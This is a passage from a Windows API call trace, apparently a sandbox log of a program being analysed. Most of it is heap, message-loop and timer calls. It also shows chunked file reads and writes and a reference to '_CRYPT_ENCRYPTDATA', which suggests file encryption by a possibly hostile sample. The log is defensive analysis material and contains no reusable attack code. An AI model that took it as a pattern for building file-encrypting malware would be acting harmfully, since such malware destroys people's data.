hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0193.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0193.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0193.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0193.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0193.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0193.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0193.609] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0193.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0193.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0193.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0193.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0193.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0193.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0193.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0193.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf6c020 [0194.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0194.156] WriteFile (in: hFile=0x2a0, lpBuffer=0xf6c020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf6c020*, lpNumberOfBytesWritten=0x8cf5e4*=0x100000, lpOverlapped=0x0) returned 1 [0194.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0194.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6c020 | out: hHeap=0x970000) returned 1 [0194.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0194.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0194.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0194.245] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0194.245] TranslateMessage (lpMsg=0x8cf708) returned 0 [0194.245] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0194.246] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0194.246] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0194.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0194.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0194.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0194.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0194.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0194.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0194.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0194.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0194.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0194.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0194.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0194.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0194.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0194.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0194.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0194.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0194.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0194.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0194.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0194.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf64020 [0194.250] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.264] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.266] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.337] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.340] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.342] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.344] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.346] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.348] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.351] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.354] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.356] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.358] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.361] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.363] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.366] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0194.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0194.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0194.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0194.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0194.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1074020 [0194.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf64020 | out: hHeap=0x970000) returned 1 [0194.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0194.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0194.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0194.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0194.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0194.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0194.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0194.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe50020 [0194.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1074020 | out: hHeap=0x970000) returned 1 [0194.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0194.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0194.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0194.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0194.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0194.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0194.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0194.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf6b020 [0194.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0194.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6b020 | out: hHeap=0x970000) returned 1 [0194.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0194.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0194.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0194.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0194.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0194.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0194.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0194.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0194.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0194.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0194.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0194.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0194.688] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0194.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0194.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0194.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf60020 [0194.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e68 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0194.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54df8 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0194.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0194.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0194.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0194.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0194.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0194.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0194.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0194.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x107f020 [0194.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0194.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0194.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0194.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0194.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0194.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0194.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0194.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0194.781] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0194.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0194.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0194.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0194.781] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0194.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0194.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0194.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0194.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0194.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0194.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0194.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0194.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0194.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0194.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0194.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0194.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0194.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 